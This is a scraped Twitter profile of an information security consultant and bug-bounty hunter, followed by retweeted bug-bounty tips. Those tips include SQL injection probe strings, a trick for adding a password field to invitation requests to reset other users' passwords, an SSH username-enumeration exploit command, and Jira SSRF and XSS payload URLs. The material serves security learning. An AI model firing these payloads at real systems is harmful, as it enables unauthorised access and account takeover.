Sajibe Kanti (@sajibekantibd)'s Twitter Profile
Sajibe Kanti

@sajibekantibd

Information Security Consultant @QNAP_nas

RHCSA | RHCE | CCNA | CNSS | VAPT | WordPress Ninja | Bug Bounty Hunter | Smart Contract Auditor | Problem Solver

ID: 745099580

https://bugcrowd.com/Sajibekanti
08-08-2012 12:26:25

1,1K Tweet

1,1K Followers

885 Following

AISECUREME (@aisecureme)

This is how to find sql-Injection 100% of the time

For site.com/?q=HERE
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Harsh Bothra (@harshbothra_)

Recently during initial #recon, I came across a vulnerable Splunk instance which had a sensitive information disclosure vulnerability (P3). Always go deep searching for #exploits and #cves whenever you encounter a third-party service. #BugBountyTip #security #bugbounty #bugs

M. Qasim Munir (@savitar0x01)

Hussein Daher While inviting users into your account/organization, you can also try inviting company emails and add a new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a user password. #BugBountyTips 1/3

swaysthinking (@swaysthinking)

Hey bountyhunters, here is an honest tip: Don't rely on twitter. Stop consuming what makes other hunters money, and start hunting and getting experience with methodologies, techniques, tools, and bug-classes that work for you. #bugbountytips #bugbounty

Mahendra Purbia (@mah3sec)

A short list of endpoints (From Unknown Resource but thanks to that guy for sharing this with me) #bugbounty #cybersecurity #bugbountytips #bugbountytip #bugcrowd #intigriti #hackerone #bugs #Pentesting

BugBountyHunter.com 🪲 (@bugbountyhunt3r)

We just added publicly disclosed issues from HackerOne sorted by vulnerability type so you can learn what types of vulnerabilities to look for on specific programs. More features in the pipeline on the way to help you with your hunt! bugbountyhunter.com/disclosed/

Lobuhi 🍉 (@lobuhisec)

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in #bugbountytips: github.com/lobuhi/byp4xx/

Aditya Shende (@adityashende17)

Burpsuite extension to bypass 403 restricted directory. Installation BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish. github.com/sting8k/BurpSu…

Aman (@thevyadha)

#bugbounty #bugbountytips Found a $$$$ RCE with CVE-2018-15473 Steps : 1. Found an IP of the company eg: testing.com then cloned the CVE from github.com/Rhynorater/CVE… 2. Ran the command /sshUsernameEnumExploit.py --username root 0.0.0.0 (ip)

Ed (@edoverflow)

Bug bounty tip: is:issue label:Vulnerable and is:issue label:"Edge case" are your friends on github.com/EdOverflow/can…. :)

Tuhin Bose (@tuhin1729_)

Jira Vulnerabilities: 1. CVE-2017-9506(SSRF): http://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing(.)com 2. CVE-2018-20824(XSS): http://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) (1/n)